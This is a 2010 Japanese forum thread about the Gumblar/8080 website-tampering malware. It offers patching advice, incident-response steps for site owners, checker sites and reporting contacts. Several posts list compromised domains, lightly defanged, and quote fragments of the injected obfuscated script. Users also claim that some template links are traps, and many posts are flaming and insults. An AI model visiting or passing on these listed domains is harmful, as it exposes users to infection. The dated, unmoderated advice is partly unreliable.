10/05/24 13:39:59
検索でチェッカー
URLリンク(www.google.co.jp)
3:名無しさん@お腹いっぱい。
10/05/24 13:41:57
まず、感染したかどうかは>>2のチェッカーで確認しましょう
Gumblar(.x)、8080系ウイルス対処法。
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)~(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
※サイトを運営されている方は、さらに次のことも実施していただきたい。
(1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
4:名無しさん@お腹いっぱい。
10/05/24 13:42:12
■Gumblar(.x)、8080系ウイルス対処法。
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
■Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
■サイトを運営されている方は、さらに次のことも実施していただきたい。
(1)管理サイトのページのソースに意味不明な文字列が埋め込まれていないか確認する
(2)改ざんされていたり、サイト管理に使うパソコンからウイルスが見つかった場合には、
ウイルスに感染していないパソコンを使用して管理サイトのパスワードを変更する
5:名無しさん@お腹いっぱい。
10/05/24 13:43:47
現在の解決策
URLリンク(www.ikkaan.com)<)
・インストール後本体をアップデート
ヘルプ → アップデートの有無をチェック
・Acrobat Javascriptをオフにする
編集 → 環境設定 → Javascript → 「Acrobat Javascriptを使用」のチェックを外す
■ Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
URLリンク(get.adobe.com)
URLリンク(www.adobe.com)
・Flash Playerのバージョン確認
URLリンク(www.adobe.com)
URLリンク(www.adobe.com)
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
URLリンク(www.adobe.com)
■ Java Runtime Environmentを更新 (Javascriptとは違うので注意)
URLリンク(www.java.com)
・Javaのバージョン確認
URLリンク(www.java.com)
■ QuickTimeを更新 (メールアドレスの入力は不要。使っていないならアンインストール)
URLリンク(www.apple.com)
■ RealPlayerを更新 (使っていないならアンインストール)
URLリンク(jp.real.com)
6:名無しさん@お腹いっぱい。
10/05/24 13:45:00
【脆弱性を利用されやすいソフトウェア】
下記については必ずアップデートしてください
使用していないものはアンインストール推奨です
■ Windows XPは可能ならば新しいOSに
■ Windows Update / Microsoft Updateを更新
・XP以下は念のためMicrosoft Updateに変更してアップデートする
Adobe Flash Playerを更新 (動画サイト見てるなら絶対入ってる。IE版、Firefox等の非IE版に注意!)
URLリンク(get.adobe.com)
URLリンク(www.adobe.com)
・Flash Playerのバージョン確認
URLリンク(www.adobe.com)
URLリンク(www.adobe.com)
■ Adobe Shockwave Playerを更新 (最近は使わないはずなのでアンインストール)
URLリンク(www.adobe.com)
■JRE(Java Runtime Environment)を更新 (Javascriptとは違うので注意)
URLリンク(www.java.com)
・Javaのバージョン確認
URLリンク(www.java.com)
7:名無しさん@お腹いっぱい。
10/05/24 13:45:49
質問はまずまとめを見てからにしましょう
まとめ
URLリンク(oceanplace.jp)
8:名無しさん@お腹いっぱい。
10/05/24 13:47:35
改竄を受けたら
ウイルス・不正アクセス届出状況について(3月分および第1四半期)
URLリンク(atakizawa.com)
(3)ウェブサイト改ざんの被害発生時の対処
ウェブサイトが改ざんされてしまった場合、ウェブサイト管理者は被害者であると同時に、ウェブサイト利用者に対する加害者となってしまう可能性があります。
被害の拡大を防ぐために、次に示すような対応が求められます。
▼まず初めに行うべきこと
まず初めに行うことは、早急にウェブサイトの公開を停止することです。同時に ftp のパスワードの変更も行ってください。
このとき、これまでウェブサイトの管理に利用していたパソコンには、ftp のパスワードを盗聴するウイルスが感染している可能性があるため、別のパソコンから操作することを勧めます。
同時に、別のウェブサイトを立てるなどして、ウェブサイト利用者に対して調査状況の説明や、問い合わせ用窓口を設けるなど、随時情報提供に努めてください。
▼改ざん箇所の洗い出し等の調査
上記の対応を行ったのち、保管しておいたクリーンなファイルとウェブサーバ上のファイルの比較などの方法で、全ての改ざん箇所の洗い出しを行ってください。
また、同じパソコンで管理しているウェブサイトが複数ある場合、他のウェブサイトにも改ざんが及んでいる可能性があるため、必ず全てのウェブサイトのファイルを確認してください。
また、改ざん期間等を把握するため、改ざん箇所ごとに ftp のアクセスログの確認などを行なって、被害状況等の調査を行ってください。
▼ウェブサイトを再公開する場合
上記の対応で全ての改ざん箇所の修正を行った上で、ウェブサイトの公開を再開する場合、必ずウェブサイト利用者への改ざんの事実の告知も掲載してください。
ウェブサイト再開の際には、判明した範囲で、次に示す情報を告知することを勧めます。
改ざんの事実の説明
・ 改ざんされていた箇所
・ 改ざんされていた期間
・ ウェブサイト利用者が改ざんされていた箇所を閲覧した場合に想定される被害(ウイルス感染など)の説明
・ ウイルスのチェック方法の説明(必要に応じてオンラインスキャンサイトの紹介など)
9:名無しさん@お腹いっぱい。
10/05/24 13:48:25
■ブラウザ別の設定方法、プラグイン・アドオン等の使い方に関しては各ブラウザのスレへ行って下さい。
※現時点では>>2以上の対策は不要です。
【改ざんサイトの調査など】
■ チェッカーサイト
・gredでチェック
URLリンク(www.gred.jp)
・aguse
URLリンク(www.aguse.net)
・WebGetter
URLリンク(rd.or.tp)
・Dan's View Source
URLリンク(www.dan.co.uk)
・飛び先のチェック by ぴょん基地の友達
URLリンク(www.kakiko.com)
10:名無しさん@お腹いっぱい。
10/05/24 13:50:13
前スレの伝説
1000 :名無しさん@お腹いっぱい。:2010/05/24(月) 13:33:02
1000なら('д') ◆yUyb3Tqn92の完全勝利!!!
>>999は苦しみながら悔しい思いをしながら死亡
更にそれ以外の弱者も普通に死亡
11:名無しさん@お腹いっぱい。
10/05/24 13:50:14
改竄を確認して通報する場合、サイト管理者への通報とともにJPCERT/CCに届出もお願いします。
■インシデント報告の届出(JPCERT/CC)
URLリンク(www.jpcert.or.jp)
■IPAに不正アクセスの届出
URLリンク(www.ipa.go.jp)
サイト管理者の連絡先不明の場合はWHOISからサーバー管理者へ通報してください。
以下、代表的なサーバー管理会社
デジロック URLリンク(www.value-domain.com)
OCN URLリンク(www.ocn.ne.jp)
さくら URLリンク(secure.sakura.ad.jp)
ロリポップ URLリンク(lolipop.jp)
GMOインターネットグループ URLリンク(secure.gmo.jp)
インフォシーク (isweb) URLリンク(portal.faq.rakuten.co.jp)
DION URLリンク(www.auone-net.jp)
NTTPCコミュニケーションズ URLリンク(www.nttpc.ne.jp)
ODN URLリンク(www.odn.ne.jp)
xserver (株式会社ベット) URLリンク(www.xserver.ne.jp)
heteml ヘテムル URLリンク(secure.heteml.jp)
ファーストサーバ URLリンク(www.firstserver.co.jp)
エキサイト URLリンク(www.excite.co.jp)
12:名無しさん@お腹いっぱい。
10/05/24 13:52:00
改竄を確認して通報する場合、サイト管理者への通報とともにJPCERT/CCに届出もお願いします。
■インシデント報告の届出(JPCERT/CC)
URLリンク(www.jpcert.or.jp)
■IPAに不正アクセスの届出
URLリンク(www.ipa.go.jp)
サイト管理者の連絡先不明の場合はWHOISからサーバー管理者へ通報してください。
以下、代表的なサーバー管理会社
デジロック URLリンク(www.value-domain.com)
OCN URLリンク(www.ocn.ne.jp)
さくら URLリンク(secure.sakura.ad.jp)
ロリポップ URLリンク(lolipop.jp)
GMOインターネットグループ URLリンク(secure.gmo.jp)
インフォシーク (isweb) URLリンク(portal.faq.rakuten.co.jp)
DION URLリンク(www.auone-net.jp)
NTTPCコミュニケーションズ URLリンク(www.nttpc.ne.jp)
ODN URLリンク(www.odn.ne.jp)
xserver (株式会社ベット) URLリンク(www.xserver.ne.jp)
heteml ヘテムル URLリンク(secure.heteml.jp)
ファーストサーバ URLリンク(www.firstserver.co.jp)
エキサイト URLリンク(www.excite.co.jp)
13:名無しさん@お腹いっぱい。
10/05/24 13:53:43
>>11と>>12かぶったorz
○通報先・便利なリンク一覧
■警視庁匿名通報フォーム(通報は2chのように書き込むだけ)
URLリンク(www.keishicho.metro.tokyo.jp)
■全国ハイテク警察リンク集 URLリンク(www002.upp.so-net.ne.jp)
■警視庁ホームページ URLリンク(www.keishicho.metro.tokyo.jp)
■警察総合相談電話番号 URLリンク(www.npa.go.jp)
(携帯電話・PHSからは全国共通#9110 緊急性を要するものは110)
■公安調査庁 URLリンク(www.moj.go.jp)
■国家公安委員会 URLリンク(www.npsc.go.jp)
■国際刑事警察機構(ICPO) URLリンク(www.interpol.int)
■国防省(アメリカ) URLリンク(www.defenselink.mil)
14:名無しさん@お腹いっぱい。
10/05/24 13:53:56
関連情報
その他、トラブル
URLリンク(search.yahoo.co.jp)
LAC セキュリティアラート
【注意喚起】Gumblar(ガンブラー)ウイルスによる新たなホームページ改ざん被害を確認
URLリンク(www.lac.co.jp)
> 株式会社ラックでは、Apacheの設定ファイルである「.htaccess」の不正アップロードを行うGumblarウイルスの活動を複数サイトにおいて確認しました。
ニュース・リリース|アンチウイルス・アンチウイルスソフトの【 カスペルスキー 】
Gumblar 亜種に続く、Pegel 対策に関する留意点
URLリンク(www.kaspersky.co.jp)
> 感染が確認された場合は、対策として OS の再インストールをお勧めします。
セキュリティ通信
サイト改ざん猛威:感染パソコンの修復は「OSの再インストール」が近道
URLリンク(www.so-net.ne.jp)
サイト改ざん(1)「告知せず」で感染拡大の恐れ~負の連鎖を断ち切るために
URLリンク(www.so-net.ne.jp)
「ガンブラー」「サイト改ざん」めぐる基本のQ&A ~ 何が起きている? 対策は?
URLリンク(www.so-net.ne.jp)
15:名無しさん@お腹いっぱい。
10/05/24 13:55:33
>>13
死ね!無能!死ね!
16:1-
10/05/24 13:56:36
スレ建てしてると割り込んで荒らすバカが居るから困る orz
17:名無しさん@お腹いっぱい。
10/05/24 13:57:55
割り込まれる馬鹿はスレ立てるなよ
18:名無しさん@お腹いっぱい。
10/05/24 13:58:36
18歳の俺が18GeT!!!!
19:名無しさん@お腹いっぱい。
10/05/24 13:59:00
割り込んだばかが言うなよ>>17
20:名無しさん@お腹いっぱい。
10/05/24 14:00:27
前スレといい
顔文字の一人勝ち状態だな
もうこれだけ完璧にやりたい放題やったんだから
別のスレに住んでくれ
21:名無しさん@お腹いっぱい。
10/05/24 14:01:14
>>20
ばかじゃね
22:名無しさん@お腹いっぱい。
10/05/24 14:01:19
>>19
馬鹿
そこで顔真っ赤にしてほざくから馬鹿なんだよ
馬鹿はスレ立てるなよ馬鹿
23:名無しさん@お腹いっぱい。
10/05/24 14:02:49
顔真っ赤w
24:名無しさん@お腹いっぱい。
10/05/24 14:03:03
確かにコテの勝ちかもしれない
1000取られたのはそこそこ有名なコテだから仕方ない
コテ本人じゃなくても知り合いみたいな取り巻きがやりかねん
25:名無しさん@お腹いっぱい。
10/05/24 14:03:16
顔文字粘着厨も顔文字もうっせーんだよ。
どちらも最悪板とかの違う板でやれや。邪魔。
26:名無しさん@お腹いっぱい。
10/05/24 14:04:09
前スレでコテ相手に顔真っ赤にしてた奴が
未だに顔真っ赤にしてるってことか
だからあれほどスレチには触れるなと言ったのに・・・その赤い顔もう元に戻らないかも
27:名無しさん@お腹いっぱい。
10/05/24 14:04:51
『確かにコテの勝ちかもしれない 』w
28:名無しさん@お腹いっぱい。
10/05/24 14:06:10
ここでコテが勝った
と書かれて、即レスした奴がコテにウイルス踏まされて粘着してた馬鹿だろうなw
釣りやすいw
29:名無しさん@お腹いっぱい。
10/05/24 14:07:57
>>1-2
乙
30:名無しさん@お腹いっぱい。
10/05/24 14:08:38
('д') ◆yUyb3Tqn92
31:名無しさん@お腹いっぱい。
10/05/24 14:23:13
自・演ド?
32:名無しさん@お腹いっぱい。
10/05/24 14:34:25
どうせこのスレも感染サイト貼るだけの枯れた糞スレだ
33:名無しさん@お腹いっぱい。
10/05/24 14:45:31
('д') ◆yUyb3Tqn92=ここの放送主
URLリンク(live.nicovideo.jp)
34:名無しさん@お腹いっぱい。
10/05/24 18:43:37
自演コテw
35:名無しさん@お腹いっぱい。
10/05/24 19:01:04
>>7>>8>>14のリンクがウイルスサイトが貼られてるやつ?
36:名無しさん@お腹いっぱい。
10/05/24 19:24:46
■ 専ブラで右クリからの検索を有効にする方法。
設定例:JaneView
設定>基本>機能>コマンド欄で
コマンド名 任意の名前
実行するコマンドに 任意のURL
を記載して追加。終わったら「よろし」をクリック。
これで設定完了。
URLリンク(www.geocities.jp)
これで専ブラから検索でチェックできるようになります。
以下がそのコマンドの一例になります。
aguse.net サイト情報検索=URLリンク(www.aguse.net)
飛び先のチェック=URLリンク(www.kakiko.com)
WebGetterでソースを見る=URLリンク(rd.or.tp)
WebGetterでタグを除去してソースを見る=URLリンク(rd.or.tp)
WebGetterでリンクを抽出する=URLリンク(rd.or.tp)
Dan's View Sourcelでソースを見る=URLリンク(www.dan.co.uk)
Dr.WEB=URLリンク(online.drweb.com)
37:名無しさん@お腹いっぱい。
10/05/24 20:02:29
コテが粘着してるときに、慌ててスレ立てる必要なかったかもな
テンプレ案もあったようだけど?
コテ自体が立てたんなら建て直してもいいかもな
38:名無しさん@お腹いっぱい。
10/05/24 20:09:09
テンプレなんか糞狐がさわいでるだけだろ
39:名無しさん@お腹いっぱい。
10/05/24 20:25:30
騒いでるのはアンチFirefox
40:名無しさん@お腹いっぱい。
10/05/24 20:26:15
糞狐おつ
41:名無しさん@お腹いっぱい。
10/05/24 20:27:16
スレ乱立あそび前の自演騒ぎか
42:名無しさん@お腹いっぱい。
10/05/24 20:27:22
ファビョって連書きしてたのは誰だったかなー
43:名無しさん@お腹いっぱい。
10/05/24 20:28:38
テンプレに変なあどおんいれこんで
どや顔したのは誰だったかなー
44:名無しさん@お腹いっぱい。
10/05/24 20:29:50
すげえ低レベルで笑える
45:名無しさん@お腹いっぱい。
10/05/24 20:30:56
糞スレざまあ
46:名無しさん@お腹いっぱい。
10/05/24 20:32:51
まあ感染するのは俺らじゃないし
47:名無しさん@お腹いっぱい。
10/05/24 20:41:07
もめんなよ
それともあほコテが混ざってんのか
48:名無しさん@お腹いっぱい。
10/05/24 20:43:15
シンスルーできないあほコテ乙
49:名無しさん@お腹いっぱい。
10/05/24 20:44:12
あほコテじゃないがなどう見ても
50:名無しさん@お腹いっぱい。
10/05/24 21:36:14
catvだろ
51:コテハン ◆8080adndqg
10/05/24 22:18:16
【陥落サイトのURL悪用厳禁】
tw13●net/
↓
tw13●net/vogue/vogue/index●html
tw13●net/scratch/
他多数
52:名無しさん@お腹いっぱい。
10/05/24 22:24:21
aguseとgredとここで御三家か?
Gumblar/8080 Checker
URLリンク(ec2-204-236-148-61.us-west-1.compute.amazonaws.com)
53:名無しさん@お腹いっぱい。
10/05/24 22:46:24
毎日更新しているようなサイトやブログなんかは
管理もまともで安全と見ていいのかな?
54:名無しさん@お腹いっぱい。
10/05/24 22:59:10
>>53
それはないわ
例えば毎日出勤してるってだけで全員仕事できる人か?
55:八頭 ◆YAGApwSaEw
10/05/24 23:02:14
Raymond.CC Blog
URLリンク(www.raymond.cc)
↓
NEW!
◆「URLVoid.com - BETA」 (9種類のサイト安全性チェックを一度に)
URLリンク(www.urlvoid.com)
*BrowserDefender (Microsoft)
*Google Diagnostic
*MalwareDomainList
*McAfee SiteAdvisor
*McAfee Trusted Secure
*MyWOT
★Norton SafeWeb
*TrendMicro Web Reputation
*Web Security Guard (URLリンク(www.websecurityguard.com))
onlinelinkscan.comとは重複しない安全性チェックになっているので、併用がベストです
◆「URLリンク(onlinelinkscan.com)」 (4種類のサイト安全性チェックを一度に Google Safe Browsing ,PhisTank ,AVG ,SiteTruth)
56:名無しさん@お腹いっぱい。
10/05/24 23:12:46
>>55
専ブラ登録するコマンド教えてもらえんじゃろか?
57:名無しさん@お腹いっぱい。
10/05/24 23:16:23
だから>>2はなんだよ
58:名無しさん@お腹いっぱい。
10/05/24 23:53:01
>>3,4の対処法だがAdobe Reader以外のPDFソフトだと気をつける事あるかな?
59:名無しさん@お腹いっぱい。
10/05/24 23:55:08
<スプリクト>C=38706;C-=201;wL={};var Vz;var PX=new Date();this. 略 onload=Vz;pq=["os"];mM=45671;mM+=100;</スプリクト>
またこれか
60:名無しさん@お腹いっぱい。
10/05/24 23:57:35
>>58
とにかくJavaスプリクト系の機能を無効にしとく
61:名無しさん@お腹いっぱい。
10/05/24 23:58:39
>>51
URLリンク(www.virustotal.com)
ふむ…
62:('д') ◆yUyb3Tqn92
10/05/25 00:06:17
('Д')ブウァハアハハハハハハハ!!!
改竄ウィルスのスレだけにテンプレも改竄ってか!!!!!
しかも
お前ら今日中、この顔文字様のことで頭いっぱい胸いっぱいだったようだな(>w<)
でもな、あれは顔文字だ!いやお前が顔文字だ!とお前らが被害妄想に陥ってる時点で俺様の作戦勝ち('д')v
63:('д') ◆yUyb3Tqn92
10/05/25 00:07:56
前スレの1000はいつもの粘着くんだね
(*'д'*)褒めて遣わす!
しかしお前ら鈍いなぁ
テンプレの真の真実に気づいてない馬鹿が多い
64:('д') ◆yUyb3Tqn92
10/05/25 00:12:32
まぁそういうわけで
またまたヽ('д')ノ俺様の計画通りだお♪
おかげで今夜もぐっすりぐっす眠できすお(=∀=)ニパー
それにしてもお前のセンスのないつまらない書き込み見てると
一番悪意に満ちているはずの俺様の書き込みがとてもキュートに見えてくる
そう。俺様はこのスレのマスコット的な存在になりつつある('д^)-☆
65:名無しさん@お腹いっぱい。
10/05/25 00:17:53
>>62-63から>>64の間にモデムリセット乙
66:名無しさん@お腹いっぱい。
10/05/25 00:18:56
何が計画どおりなのかサッパリわからん
まぁ、一人で妄想してな(´∀`)
67:('д') ◆yUyb3Tqn92
10/05/25 00:26:45
はい釣れた(>w<)成功!
必死にアンカまで細かく付けちゃってどしたの?笑
悔しそうな負け犬の遠吠えも見れたことだし
今夜はおやすみしちゃうね(~д~)zZZ←調子乗った状態で眠りにつく俺w
68:あんちたった
10/05/25 00:33:42
>>67
コイツなんでアク禁ならんだろうね
69:名無しさん@お腹いっぱい。
10/05/25 00:36:25
>>67
褒めるわけじゃないが
ほんと人をムカつかせるのがうまいコテだな
その才能だけは認めてやる
だから
もう
おまえも
おやすみ
70:名無しさん@お腹いっぱい。
10/05/25 00:38:14
URLリンク(www.unmaskparasites.com)
URLリンク(vurldissect.co.uk)
こちらもチェックにどうぞ
71:あんちたった
10/05/25 00:39:31
うー
だれかおれにトリップの付け方教えてくれー
ぐぐるのやだよーう(´;ω;`)
72:あんちたった♯tesとん
10/05/25 00:40:33
ぐぐったら
簡単だった
いでよ俺のトリップ
73:あんちたった ◆a.oH.VVCow
10/05/25 00:41:37
今のなしでよろ
74:名無しさん@お腹いっぱい。
10/05/25 00:42:16
>>73
なしにはならないwwwwwww
75:あんちたった ◆a.oH.VVCow
10/05/25 00:42:57
>>74
しね
人のミスをそうやって鬼の首とったみたいに言うのよくないぞ
76:名無しさん@お腹いっぱい。
10/05/25 00:44:01
あんちたったが頭の悪い子なのは前から知ってたけど
ここまで酷いとは
77:名無しさん@お腹いっぱい。
10/05/25 00:56:58
ひでぇw
78:あんちたった
10/05/25 00:58:17
偽者乙。
俺は偽が出るのを承知であえてトリップつけてないわけだがココまでバカにされるとむかつくわ
79:名無しさん@お腹いっぱい。
10/05/25 01:04:30
>>78
誤魔化さなくていいよw
トリップ付け間違い乙!www
しかもむかつくとかほざくならトリップ付ければ済むことだろう
本当に馬鹿なんだな
80:名無しさん@お腹いっぱい。
10/05/25 01:10:48
どう見ても>>72でした痛いミスを自分じゃなかったことにしたいだけだろ
>>79じゃないが、こんなことでファビョるんだったら最初から酉しとけよ
81:名無しさん@お腹いっぱい。
10/05/25 01:15:04
71 :あんちたった:2010/05/25(火) 00:39:31
うー
だれかおれにトリップの付け方教えてくれー
ぐぐるのやだよーう(´;ω;`)
72 :あんちたった♯tesとん:2010/05/25(火) 00:40:33
ぐぐったら
簡単だった
いでよ俺のトリップ
73 :あんちたった ◆a.oH.VVCow :2010/05/25(火) 00:41:37
今のなしでよろ
75 :あんちたった ◆a.oH.VVCow :2010/05/25(火) 00:42:57
>>74
しね
人のミスをそうやって鬼の首とったみたいに言うのよくないぞ
76 :名無しさん@お腹いっぱい。:2010/05/25(火) 00:44:01
あんちたったが頭の悪い子なのは前から知ってたけど
ここまで酷いとは
77 :名無しさん@お腹いっぱい。:2010/05/25(火) 00:56:58
ひでぇw
78 :あんちたった:2010/05/25(火) 00:58:17
偽者乙。
俺は偽が出るのを承知であえてトリップつけてないわけだがココまでバカにされるとむかつくわ
82:名無しさん@お腹いっぱい。
10/05/25 01:18:22
酉の入力ミスした段階で素直に認めてれば笑い話で終わったのに
偽者ってことにして逃げようと必死になっちゃったことで逆に痛さを増しちゃってるよこの人
自分でむかつくとか書いちゃう性格からして、今頃、画面の前でもっとむかつてそうだなwww
83:名無しさん@お腹いっぱい。
10/05/25 01:20:13
>>5が罠になってるな
84:WARNING(=あんちたった) ◆MOTO.0SDfQ
10/05/25 01:21:23
残念ながらトリップは既に持ってるし。
>しかもむかつくとかほざくならトリップ付ければ済むことだろう
まさかココまでバカなキャラにされるとは思わなかったんだよ!
85:あんちたった ◆MOTO.0SDfQ
10/05/25 01:27:17
まぁ、なんて言い訳してもID出ない板で酉付けずにコテ名乗った俺の負けか。
86:名無しさん@お腹いっぱい。
10/05/25 01:30:18
>>5と>>7が罠だな
87:名無しさん@お腹いっぱい。
10/05/25 01:32:20
>>84-85
IDのあるなしは関係ない
自分の書き込み見直してどうしてこうなったかよく考えろ
お前はどれだけ自分が頭が悪いか自覚しないと治らないからw
88:名無しさん@お腹いっぱい。
10/05/25 01:33:02
>>8>>9も罠
89:名無しさん@お腹いっぱい。
10/05/25 01:36:17
>>85
お前コテ向いてないwwww
('д') ◆yUyb3Tqn92に弟子入りしてこいよww
コテは最低限のずる賢さと図太さがないとやってけないぞw
90:名無しさん@お腹いっぱい。
10/05/25 01:38:57
あんちたったって昨日('д')に粘着してた奴じゃね?
知能レベルの低さと文体が似すぎてるからほぼ確定だろ
91:名無しさん@お腹いっぱい。
10/05/25 01:42:39
改竄ウイルス踏まされた奴が
その関連スレに集まるのは必然だが
そのスレにウイルス踏ませた張本人がいたとしたら!?
こうやってこのスレにコテにウイルス踏まされた奴が集まっていって
粘着住人が量産される仕組みだったりしてな
・・・・・考えすぎか
92:名無しさん@お腹いっぱい。
10/05/25 01:46:17
URLリンク(www.applique-soft)●com/set●html(復旧済みらしい)
こうやってちゃんと告知してくれるとありがたいな
ソネットに載ったら笑えるがww
93:あんちたった ◆MOTO.0SDfQ
10/05/25 01:59:18
新スレ立ったと思ったらテンプレ改竄されてましたと?
うわぁ、悪質やなwww
知らない人は踏んじゃうかも知れんな、顔文字の仕業か?
94:あんちたった ◆MOTO.0SDfQ
10/05/25 01:59:58
>>90
いや、このスレに来たのは凄く久しぶりなのだが
95:名無しさん@お腹いっぱい。
10/05/25 02:03:49
>>94
いつまで見苦しい言いわけ続けるんだ
飽きたから死ね
96:あんちたった ◆MOTO.0SDfQ
10/05/25 02:04:32
おk、今後言い訳はしない。
煽りはスルーな!
97:名無しさん@お腹いっぱい。
10/05/25 02:06:43
と、スルーできずにふぁびょってた奴が言っても説得力がry
はいおしまい
98:名無しさん@お腹いっぱい。
10/05/25 02:08:38
>>92俺が担当者なら、告知しない方が勇気いるな
立場がもっと悪くなることもある
[「ホリプロ」サイト、ガンブラー感染公表せず : ニュース・新製品 : セキュリティー : ネット&デジタル : YOMIURI ONLINE(読売新聞)]
URLリンク(www.yomiuri.co.jp)
[ガンブラー対策、 ウェブ制作会社名の公表が有効 | BPnetビズカレッジ:トレンド | nikkei BPnet 〈日経BPネット〉]
URLリンク(www.nikkeibp.co.jp)
それにしてもテンプレにGENO張るのはまずいよ
やめてくれよ
99:名無しさん@お腹いっぱい。
10/05/25 02:17:06
>>7は修正してトップページにちゃんと告知してますね
>>5はまだ修正されていないので、宴会予約フォームで連絡してみましたがどうなることやら…
100:名無しさん@お腹いっぱい。
10/05/25 06:04:07
ところどころに散見される('д') ◆yUyb3Tqn92の自画自賛
くだらなすぎる
奴が現れる前後で書き込まれるコメには特長あるから
どんな形であっても誉めるような、意味のわからないコメは自演と見ていい
なににベクトルが向いてるのかを考えたら、浮いたコメはすぐにわかる
時間がいくらでもある廃人には勝てないので、相手する意味も価値もなし
このスレに以前から居る人はほとんど参加してないとは思うけど
101:名無しさん@お腹いっぱい。
10/05/25 06:08:13
自演のかまって乙
102:('д') ◇yUyb3Tqn92
10/05/25 13:08:00
あほコテといっても中身は生身の中年なんだってな
103:名無しさん@お腹いっぱい。
10/05/25 13:20:14
www●mamapapa●net
104:名無しさん@お腹いっぱい。
10/05/25 14:49:09
取扱注意
population-japan●com
shibahoru●chicappa●jp/blog/
www●konishi-chem●co●jp
105:名無しさん@お腹いっぱい。
10/05/25 15:02:45
ehappy●jp
改ざんされてる通販サイトはインターネット通販止めろ
106:名無しさん@お腹いっぱい。
10/05/25 15:54:03
最近の惨状を見てLinuxとのデュアルブートを考え始めた俺ガイル
Ubuntu辺り入れてWebブラウジングは仮想ブラウザでやればウイルスとは無縁でいられるかね
107:名無しさん@お腹いっぱい。
10/05/25 16:01:39
いやアプでとしとけば平気だから
それでも不安ならせいぜいスクリプトきっとけ
108:名無しさん@お腹いっぱい。
10/05/25 16:01:51
Linuxだってウイルスがないわけじゃない
シロウトがマルチブートやるとろくなことにならん
109:名無しさん@お腹いっぱい。
10/05/25 16:05:27
>>107
スクリプトなんてとっくに切ってるよ
110:名無しさん@お腹いっぱい。
10/05/25 16:06:55
ああほんとごくろうさん
111:コテハン ◆8080adndqg
10/05/25 16:25:28
【陥落サイトのURL悪用厳禁】
ama●minasan●info/
butuda●f00●jp
kadaru●mydns●to/ ←なんとかしろよw
↓
センセイに聞いてみた
www●google●co●jp/search?hl=ja&source=hp&q=site%3Akadaru●mydns●to%2F+-nsx+-ms
www●woman-seiwa●co●jp/ ←通販
www●ne●jp/asahi/sanya/sanpo ←絶賛放置中
unice●jp/
www●stopper-k●co●jp/
retri●jp/ ←?
112:名無しさん@お腹いっぱい。
10/05/25 16:54:36
>>3>>4以上の対策はホントに気休めとか、対策やりきった後の一押し程度のレベルだった筈
とりあえず怖くなってここに初めて来たって人なら>>3>>4済ませておけば05/25現時点では大丈夫のはず。
JREは上書きアプデだと前のデータが残ってるかもしれないからコンパネで消して新しく入れ直した方が良いんだっけ?
113:名無しさん@お腹いっぱい。
10/05/25 17:38:44
メーカー製PCとかでJREがプリインスコされてるのが稀にあって
そういうのはアップデートしても元から入ってる奴がこっそり残ってる、って話じゃなかったっけ
まあどちらにしろ消してから入れるってのが無難か
114:名無しさん@お腹いっぱい。
10/05/25 18:12:34
コントロールパネルで消して新しいバージョンをインストールしても
firefoxのアドオンに古いバージョンが残ったままで消えない
これは無効にしてれば大丈夫なのかな
115:コテハン ◆8080adndqg
10/05/25 18:26:25
retri●jp/
↓
8080の下に転がってる
str="<ijbwjuics src=" + unescape(・・・
こいつは新型かな?
116:名無しさん@お腹いっぱい。
10/05/25 18:42:05
>>111
>www●ne●jp/asahi/sanya/sanpo ←絶賛放置中
URLリンク(www.aguse.jp)
株式会社朝日ネットから連絡してくれるそうです
電凸すると電凸貧乏になるから
折り返し連絡をくれるとたすかる
朝日ネット◎
117:名無しさん@お腹いっぱい。
10/05/25 18:46:22
JREはブラウザプラグインとして呼び出されるのは
変な設定しない限り、インストールされた最新版が利用されるはずなんだけど
JRE1.xとか古いのが入ってると、そっちが呼び出されたり変な動作する可能性があるって聞いた
URLリンク(www.cals.jacic.or.jp)
URLリンク(www.ebid.pref.fukui.jp)
URLリンク(ebid-portal.kumamoto-idc.pref.kumamoto.jp)
JRE1.xとか窓から投げ捨てろと言いたいのに
政府官庁自治体系システムはホント癌だわ
118:名無しさん@お腹いっぱい。
10/05/25 18:54:38
www●belbird●com
www●my-standard●co●jp
wangnin●com
www●pasotasu●net←パソコントラブル解決?無理でしょ
www●mamapapa●net←pasotasuが作成しているサイト
119:名無しさん@お腹いっぱい。
10/05/25 19:23:26
例えば>>118
aguseでは、上から一つ目三つ目だけGumblarの疑いありの判断。
gredでは、すべてSAFEと判断。
こういったツールすらスルーするものをここで報告してる人はどうやって見つけてんの
感染してそうなサイトをしらみ潰しにソース見てるとか?
120:名無しさん@お腹いっぱい。
10/05/25 19:31:15
>>119
見つけてくるんじゃなくて、自分で仕込んで
ここで晒してるだけなんだよw
121:名無しさん@お腹いっぱい。
10/05/25 20:07:35
>>119
分からない人は知る必要がないよ
対策をちゃんとしてればいい
122:名無しさん@お腹いっぱい。
10/05/25 20:44:00
知る必要がないとか
123:名無しさん@お腹いっぱい。
10/05/25 20:45:02
>>99
